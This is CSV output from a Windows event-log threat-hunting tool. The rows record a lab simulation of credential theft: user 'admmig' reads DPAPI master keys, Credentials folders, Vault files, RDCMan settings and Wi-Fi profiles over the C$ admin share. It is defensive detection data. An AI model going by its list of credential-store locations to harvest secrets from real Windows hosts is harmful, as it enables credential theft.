Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.794 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.810 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.826 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.841 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.889 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.905 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.940 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.956 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.568 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.601 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.631 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.666 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.718 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.562 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
